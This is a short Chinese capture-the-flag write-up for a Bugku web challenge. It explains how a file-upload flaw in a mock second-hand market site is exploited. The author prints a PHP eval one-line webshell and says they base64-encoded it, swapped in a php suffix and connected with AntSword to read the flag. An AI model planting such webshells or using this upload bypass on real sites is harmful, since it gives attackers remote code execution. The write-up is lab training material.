Bugku CTF之xxx二手交易市场
Bugku CTF之xxx二手交易市场
- 0x001 wp
- 0x002 结束语
0x001 wp
打开题目,点击进入链接,是一个二手交易市场平台
开始想的可不可能是修改购买价格,然后发现根本没有购买功能,只能先登录看看
根据我学过的一丢丢漏洞知识,感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;
前两个观摩尝试了半天,没找到头绪。
看看头像上传,上传文件,抓包
看到后面好长一串,image
参数后面是文件后缀JPEG
,然后有base 64
,再后面应该是图片的base64
编码,看看传个一句马试试
先把<?php @eval($_POST['huacheng']);?>base64
加密一下,提换掉后面的一长串,然后改一下后缀为php
响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag
0x002 结束语
我不后悔
Bugku CTF之xxx二手交易市场相关推荐
- BugKu CTF Web
BugKu CTF Web 滑稽 计算器 GET POST Simple_SSTI_1 矛盾 eval 变量1 Simple_SSTI_2 alert 你必须让他停下 方法一 方法二 方法三 网站被黑 ...
- [Bugku CTF——Pwn] pwn2
[Bugku CTF--Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 explo ...
- [Bugku CTF——Pwn] pwn4
[Bugku CTF--Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadge ...
- [Bugku CTF——Pwn] pwn1
[Bugku CTF--Pwn] pwn1 题目地址:https://ctf.bugku.com/ 额, 直接nc连接上,就可以直接得到shell 好水哦,新手玩玩就好,老鸟勿喷 无语凝噎 cat f ...
- BugKu CTF(杂项篇MISC)—放松一下吧
CTF BugKu CTF (杂项篇MISC) 攻与防 放松一下吧 描 述: bugku{} 下载后是一个压缩包. 一.工具 十六进制编辑工具 010 editor 图片加解密工具F5-stegano ...
- BugKu CTF(杂项篇MISC)—想要种子吗
CTF BugKu CTF (杂项篇MISC) 攻与防 想要种子吗 提 示: 描 述:flag{} 题目下载后是一张图片,打开如下. 一.工具 十六进制编辑器010 editor kali系统文件分离 ...
- 校园转转二手市场源码/Java二手交易市场整站源码
☑️ 编号:ym367 ☑️ 品牌:无 ☑️ 语言:Java ☑️ 大小:33MB ☑️ 类型:二手交易市场 ☑️ 支持:pc+wap
- Android Studio校园二手交易市场app
[安卓大作业]Android Studio校园二手交易市场app 界面展示 主要功能 1.登陆注册用户,若忘记密码可通过邮箱找回密码: 2.商品分类展示,可在首页购买商品: 3.商品详情页可留言.收藏 ...
- BugKu CTF(杂项篇MISC)---细心的大象
BugKu CTF(杂项篇MISC)-细心的大象 下载得到图片 foremost 分离得到压缩包 foremost 1.jpg 查看图片详细信息 TVNEUzQ1NkFTRDEyM3p6 base64 ...
- springboot校园二手交易市场网站毕业设计-附源码071008
目 录 摘要 1 绪论 1.1 研究背景 1.2国内外研究现状 1.3论文结构与章节安排 2校园二手交易市场网站系统分析 2.1 可行性分析 2.2 系统流程分析 2.2.1 数据流程 3.3.2 ...
最新文章
- 老年机按键串号_2019年最适合买的老人机——AGM M5,4G全网通+支持微信
- piwik mysql_piwik流量统计系统搭建(apache2.4+piwik+mysql5.6+php5.6.14)
- docker常用命令(总结)
- 编写函数,可以接收任意多个整数并输出其中的最大值和所有整数之和。
- php并发访问排队_PHP高并发处理方案
- 探索 OpenStack 之(10):深入镜像服务Glance
- GitHub.com上的那些东西你都知道什么意思吗?
- P1866 编号 python
- World Wind Java开发之十——AnalyticSurface栅格渲染(转)
- SQL Server安装问题程序被挂起的错误解决办法
- [delphi函数]RenameFile 文件改名
- 5-2 持久化的作用/5-3 RDB1/5-4 RDB2/5-5 RDB3
- C#版Windows服务安装卸载小工具-附源码
- 20190613 一个SQL问题
- Office Tool Plus v8.2.4.0 安装Office组件小工具
- android登录ins,在android中集成instagram身份验证
- 关于 jspx 文件的一些说明
- 【亲自实践能够下载的谷歌地图切片url地址】谷歌地图数据下载的尝试以及Python爬虫实现
- 电脑与电脑之间快速传输大文件的方法
- 计算机量子化学计算焓,本科毕业论文--量子化学计算的基本原理及应用.doc